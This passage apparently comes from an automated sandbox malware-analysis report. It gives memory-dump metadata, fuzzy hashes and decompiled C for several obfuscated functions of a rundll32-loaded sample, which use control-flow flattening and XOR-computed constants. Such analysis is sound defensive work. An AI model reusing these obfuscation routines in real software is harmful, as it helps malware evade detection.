                                                                                                                      0x0069d24d
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                      • API String ID: 1514166925-553023378
                                                                                                                      • Opcode ID: 67cd9cf836bee7a7bae58fbc7eb6275c439750afef26172e25377275506725ee
                                                                                                                      • Instruction ID: d0faec9dc2d12c51be231ec58a2eb1603922922282a6a7b79576de6df17794bf
                                                                                                                      • Opcode Fuzzy Hash: 67cd9cf836bee7a7bae58fbc7eb6275c439750afef26172e25377275506725ee
                                                                                                                      • Instruction Fuzzy Hash: 6D0220B14083819FD3A4CF25C989A9BFBE6FBC4708F10891DF1D986260D7B1894ACF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006870B3 Relevance: 10.3, Strings: 8, Instructions: 273COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006870B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x6a3dfc; // 0x0
							_t302 = E00695B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x6a3dfc; // 0x0
								_t306 = E00695B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E00687FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E00698519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}




















































                                                                                                                      0x006870bc
                                                                                                                      0x006870c3
                                                                                                                      0x006870c6
                                                                                                                      0x006870cd
                                                                                                                      0x006870d4
                                                                                                                      0x006870d5
                                                                                                                      0x006870d6
                                                                                                                      0x006870d7
                                                                                                                      0x006870dc
                                                                                                                      0x006870e7
                                                                                                                      0x006870e9
                                                                                                                      0x006870f0
                                                                                                                      0x006870f3
                                                                                                                      0x006870fd
                                                                                                                      0x00687102
                                                                                                                      0x00687107
                                                                                                                      0x0068710f
                                                                                                                      0x00687117
                                                                                                                      0x0068711f
                                                                                                                      0x00687127
                                                                                                                      0x00687132
                                                                                                                      0x00687137
                                                                                                                      0x0068713d
                                                                                                                      0x00687145
                                                                                                                      0x0068714d
                                                                                                                      0x00687159
                                                                                                                      0x0068715e
                                                                                                                      0x00687164
                                                                                                                      0x00687169
                                                                                                                      0x0068716e
                                                                                                                      0x00687176
                                                                                                                      0x00687183
                                                                                                                      0x00687186
                                                                                                                      0x0068718a
                                                                                                                      0x00687198
                                                                                                                      0x0068719c
                                                                                                                      0x006871a4
                                                                                                                      0x006871ac
                                                                                                                      0x006871b4
                                                                                                                      0x006871bc
                                                                                                                      0x006871c1
                                                                                                                      0x006871c9
                                                                                                                      0x006871d1
                                                                                                                      0x006871db
                                                                                                                      0x006871df
                                                                                                                      0x006871e4
                                                                                                                      0x006871ec
                                                                                                                      0x006871f4
                                                                                                                      0x006871fc
                                                                                                                      0x00687201
                                                                                                                      0x00687206
                                                                                                                      0x0068720e
                                                                                                                      0x00687216
                                                                                                                      0x0068721e
                                                                                                                      0x00687226
                                                                                                                      0x0068722e
                                                                                                                      0x00687233
                                                                                                                      0x00687238
                                                                                                                      0x00687240
                                                                                                                      0x00687248
                                                                                                                      0x00687256
                                                                                                                      0x0068725b
                                                                                                                      0x00687261
                                                                                                                      0x00687266
                                                                                                                      0x0068726e
                                                                                                                      0x0068727b
                                                                                                                      0x0068727e
                                                                                                                      0x00687282
                                                                                                                      0x0068728a
                                                                                                                      0x00687297
                                                                                                                      0x0068729b
                                                                                                                      0x006872a3
                                                                                                                      0x006872ab
                                                                                                                      0x006872b3
                                                                                                                      0x006872b8
                                                                                                                      0x006872c0
                                                                                                                      0x006872c8
                                                                                                                      0x006872cd
                                                                                                                      0x006872d2
                                                                                                                      0x006872da
                                                                                                                      0x006872e2
                                                                                                                      0x006872ea
                                                                                                                      0x006872f2
                                                                                                                      0x006872ff
                                                                                                                      0x00687303
                                                                                                                      0x0068730b
                                                                                                                      0x0068731b
                                                                                                                      0x0068731f
                                                                                                                      0x00687327
                                                                                                                      0x0068732f
                                                                                                                      0x00687337
                                                                                                                      0x0068733f
                                                                                                                      0x00687344
                                                                                                                      0x0068734c
                                                                                                                      0x00687354
                                                                                                                      0x00687359
                                                                                                                      0x0068735a
                                                                                                                      0x0068735e
                                                                                                                      0x00687363
                                                                                                                      0x0068736b
                                                                                                                      0x00687373
                                                                                                                      0x0068737b
                                                                                                                      0x00687385
                                                                                                                      0x00687389
                                                                                                                      0x0068738d
                                                                                                                      0x00687395
                                                                                                                      0x0068739d
                                                                                                                      0x006873a2
                                                                                                                      0x006873aa
                                                                                                                      0x006873b2
                                                                                                                      0x006873b7
                                                                                                                      0x006873bf
                                                                                                                      0x006873c7
                                                                                                                      0x006873cf
                                                                                                                      0x006873d4
                                                                                                                      0x006873dc
                                                                                                                      0x006873ea
                                                                                                                      0x006873ee
                                                                                                                      0x006873f6
                                                                                                                      0x006873fe
                                                                                                                      0x00687403
                                                                                                                      0x0068740b
                                                                                                                      0x00687413
                                                                                                                      0x0068741b
                                                                                                                      0x00687420
                                                                                                                      0x00687428
                                                                                                                      0x00687430
                                                                                                                      0x0068743d
                                                                                                                      0x00687443
                                                                                                                      0x00687448
                                                                                                                      0x0068744d
                                                                                                                      0x00687455
                                                                                                                      0x00687463
                                                                                                                      0x0068746b
                                                                                                                      0x0068746f
                                                                                                                      0x00687477
                                                                                                                      0x00687477
                                                                                                                      0x00687485
                                                                                                                      0x00687592
                                                                                                                      0x006875a6
                                                                                                                      0x006875ab
                                                                                                                      0x006875b2
                                                                                                                      0x006875b4
                                                                                                                      0x00000000
                                                                                                                      0x006875b4
                                                                                                                      0x0068748b
                                                                                                                      0x00687491
                                                                                                                      0x00687531
                                                                                                                      0x00687542
                                                                                                                      0x00687547
                                                                                                                      0x0068754e
                                                                                                                      0x006875d7
                                                                                                                      0x006875d9
                                                                                                                      0x006875e1
                                                                                                                      0x00687550
                                                                                                                      0x00687550
                                                                                                                      0x00000000
                                                                                                                      0x00687550
                                                                                                                      0x00687493
                                                                                                                      0x00687499
                                                                                                                      0x006874d4
                                                                                                                      0x006874d5
                                                                                                                      0x006874d6
                                                                                                                      0x006874db
                                                                                                                      0x006874e6
                                                                                                                      0x006874ec
                                                                                                                      0x00000000
                                                                                                                      0x006874ec
                                                                                                                      0x0068749b
                                                                                                                      0x006874a1
                                                                                                                      0x00000000
                                                                                                                      0x006874a7
                                                                                                                      0x006874b6
                                                                                                                      0x006874bb
                                                                                                                      0x006874a1
                                                                                                                      0x00687499
                                                                                                                      0x00687491
                                                                                                                      0x006875e4
                                                                                                                      0x006875f0
                                                                                                                      0x006875f0
                                                                                                                      0x006875be
                                                                                                                      0x006875c0
                                                                                                                      0x006875c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                      • API String ID: 0-2314355462
                                                                                                                      • Opcode ID: 591aba3bf56b764bda82044ca47641e41339a6a79bb5a0e1e8e36b1692b56d58
                                                                                                                      • Instruction ID: 3d5d68e0f2b735654d99877402a4b299099d4d835e5f014d3a452bb488164c86
                                                                                                                      • Opcode Fuzzy Hash: 591aba3bf56b764bda82044ca47641e41339a6a79bb5a0e1e8e36b1692b56d58
                                                                                                                      • Instruction Fuzzy Hash: 91D1FE721083819FC764CF65C48995BBBF2BBC4748F60891DF6A686260C7B6D549CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069C631 Relevance: 10.2, Strings: 8, Instructions: 218COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0069C631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E0068474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E0068474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E0068474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E0069C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E0068474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E0068474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E0069C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}








































                                                                                                                      0x0069c631
                                                                                                                      0x0069c638
                                                                                                                      0x0069c63a
                                                                                                                      0x0069c644
                                                                                                                      0x0069c649
                                                                                                                      0x0069c64e
                                                                                                                      0x0069c656
                                                                                                                      0x0069c65e
                                                                                                                      0x0069c666
                                                                                                                      0x0069c66e
                                                                                                                      0x0069c676
                                                                                                                      0x0069c67e
                                                                                                                      0x0069c682
                                                                                                                      0x0069c68a
                                                                                                                      0x0069c692
                                                                                                                      0x0069c697
                                                                                                                      0x0069c69f
                                                                                                                      0x0069c6a7
                                                                                                                      0x0069c6af
                                                                                                                      0x0069c6b7
                                                                                                                      0x0069c6bf
                                                                                                                      0x0069c6c7
                                                                                                                      0x0069c6cf
                                                                                                                      0x0069c6d7
                                                                                                                      0x0069c6e2
                                                                                                                      0x0069c6e4
                                                                                                                      0x0069c6e9
                                                                                                                      0x0069c6ef
                                                                                                                      0x0069c6f7
                                                                                                                      0x0069c6fc
                                                                                                                      0x0069c704
                                                                                                                      0x0069c70c
                                                                                                                      0x0069c714
                                                                                                                      0x0069c719
                                                                                                                      0x0069c721
                                                                                                                      0x0069c729
                                                                                                                      0x0069c731
                                                                                                                      0x0069c736
                                                                                                                      0x0069c73e
                                                                                                                      0x0069c746
                                                                                                                      0x0069c74b
                                                                                                                      0x0069c750
                                                                                                                      0x0069c758
                                                                                                                      0x0069c760
                                                                                                                      0x0069c76c
                                                                                                                      0x0069c771
                                                                                                                      0x0069c777
                                                                                                                      0x0069c77f
                                                                                                                      0x0069c787
                                                                                                                      0x0069c793
                                                                                                                      0x0069c796
                                                                                                                      0x0069c79a
                                                                                                                      0x0069c7a2
                                                                                                                      0x0069c7aa
                                                                                                                      0x0069c7b7
                                                                                                                      0x0069c7bb
                                                                                                                      0x0069c7c3
                                                                                                                      0x0069c7d0
                                                                                                                      0x0069c7d4
                                                                                                                      0x0069c7d9
                                                                                                                      0x0069c7e1
                                                                                                                      0x0069c7e9
                                                                                                                      0x0069c7f1
                                                                                                                      0x0069c7f9
                                                                                                                      0x0069c801
                                                                                                                      0x0069c813
                                                                                                                      0x0069c817
                                                                                                                      0x0069c81f
                                                                                                                      0x0069c827
                                                                                                                      0x0069c834
                                                                                                                      0x0069c838
                                                                                                                      0x0069c840
                                                                                                                      0x0069c848
                                                                                                                      0x0069c850
                                                                                                                      0x0069c858
                                                                                                                      0x0069c860
                                                                                                                      0x0069c868
                                                                                                                      0x0069c870
                                                                                                                      0x0069c878
                                                                                                                      0x0069c880
                                                                                                                      0x0069c888
                                                                                                                      0x0069c890
                                                                                                                      0x0069c898
                                                                                                                      0x0069c8a5
                                                                                                                      0x0069c8ae
                                                                                                                      0x0069c8b2
                                                                                                                      0x0069c8ba
                                                                                                                      0x0069c8c2
                                                                                                                      0x0069c8ca
                                                                                                                      0x0069c8cf
                                                                                                                      0x0069c8d7
                                                                                                                      0x0069c8df
                                                                                                                      0x0069c8e4
                                                                                                                      0x0069c8e9
                                                                                                                      0x0069c8f1
                                                                                                                      0x0069c8f9
                                                                                                                      0x0069c901
                                                                                                                      0x0069c909
                                                                                                                      0x0069c911
                                                                                                                      0x0069c911
                                                                                                                      0x0069c919
                                                                                                                      0x0069c919
                                                                                                                      0x0069c919
                                                                                                                      0x0069c919
                                                                                                                      0x0069c91b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069c921
                                                                                                                      0x0069c9e2
                                                                                                                      0x0069c9e3
                                                                                                                      0x0069c9e4
                                                                                                                      0x0069c9e9
                                                                                                                      0x0069c9ec
                                                                                                                      0x0069c9f1
                                                                                                                      0x00000000
                                                                                                                      0x0069c927
                                                                                                                      0x0069c92d
                                                                                                                      0x0069c9c0
                                                                                                                      0x0069c9c1
                                                                                                                      0x0069c9c2
                                                                                                                      0x0069c9c7
                                                                                                                      0x0069c9ca
                                                                                                                      0x0069c9cf
                                                                                                                      0x00000000
                                                                                                                      0x0069c933
                                                                                                                      0x0069c939
                                                                                                                      0x0069c99e
                                                                                                                      0x0069c99f
                                                                                                                      0x0069c9a0
                                                                                                                      0x0069c9a5
                                                                                                                      0x0069c9a8
                                                                                                                      0x0069c9ad
                                                                                                                      0x00000000
                                                                                                                      0x0069c93b
                                                                                                                      0x0069c941
                                                                                                                      0x0069c97d
                                                                                                                      0x0069c981
                                                                                                                      0x0069c986
                                                                                                                      0x0069c989
                                                                                                                      0x0069c98e
                                                                                                                      0x00000000
                                                                                                                      0x0069c943
                                                                                                                      0x0069c949
                                                                                                                      0x00000000
                                                                                                                      0x0069c94f
                                                                                                                      0x0069c95b
                                                                                                                      0x0069c95c
                                                                                                                      0x0069c95d
                                                                                                                      0x0069c962
                                                                                                                      0x0069c965
                                                                                                                      0x0069c96a
                                                                                                                      0x00000000
                                                                                                                      0x0069c96a
                                                                                                                      0x0069c949
                                                                                                                      0x0069c941
                                                                                                                      0x0069c939
                                                                                                                      0x0069c92d
                                                                                                                      0x0069ca5f
                                                                                                                      0x0069ca68
                                                                                                                      0x0069ca68
                                                                                                                      0x0069c9fe
                                                                                                                      0x0069ca26
                                                                                                                      0x0069ca27
                                                                                                                      0x0069ca28
                                                                                                                      0x0069ca2d
                                                                                                                      0x0069ca30
                                                                                                                      0x0069ca32
                                                                                                                      0x00000000
                                                                                                                      0x0069ca00
                                                                                                                      0x0069ca06
                                                                                                                      0x0069ca5d
                                                                                                                      0x0069ca08
                                                                                                                      0x0069ca0e
                                                                                                                      0x00000000
                                                                                                                      0x0069ca10
                                                                                                                      0x0069ca10
                                                                                                                      0x00000000
                                                                                                                      0x0069ca10
                                                                                                                      0x0069ca0e
                                                                                                                      0x0069ca06
                                                                                                                      0x00000000
                                                                                                                      0x0069ca34
                                                                                                                      0x0069ca34
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                      • API String ID: 0-1553751006
                                                                                                                      • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                      • Instruction ID: f0ff06b49c361b8a100ce590f81f18cae76059863496bab946291b0a730880d9
                                                                                                                      • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                      • Instruction Fuzzy Hash: 65A142B28083419FC798CF29D48A44FFBE6BB95798F504A1DF59596220D3B5CA09CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069F435 Relevance: 9.3, Strings: 7, Instructions: 536COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069F435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
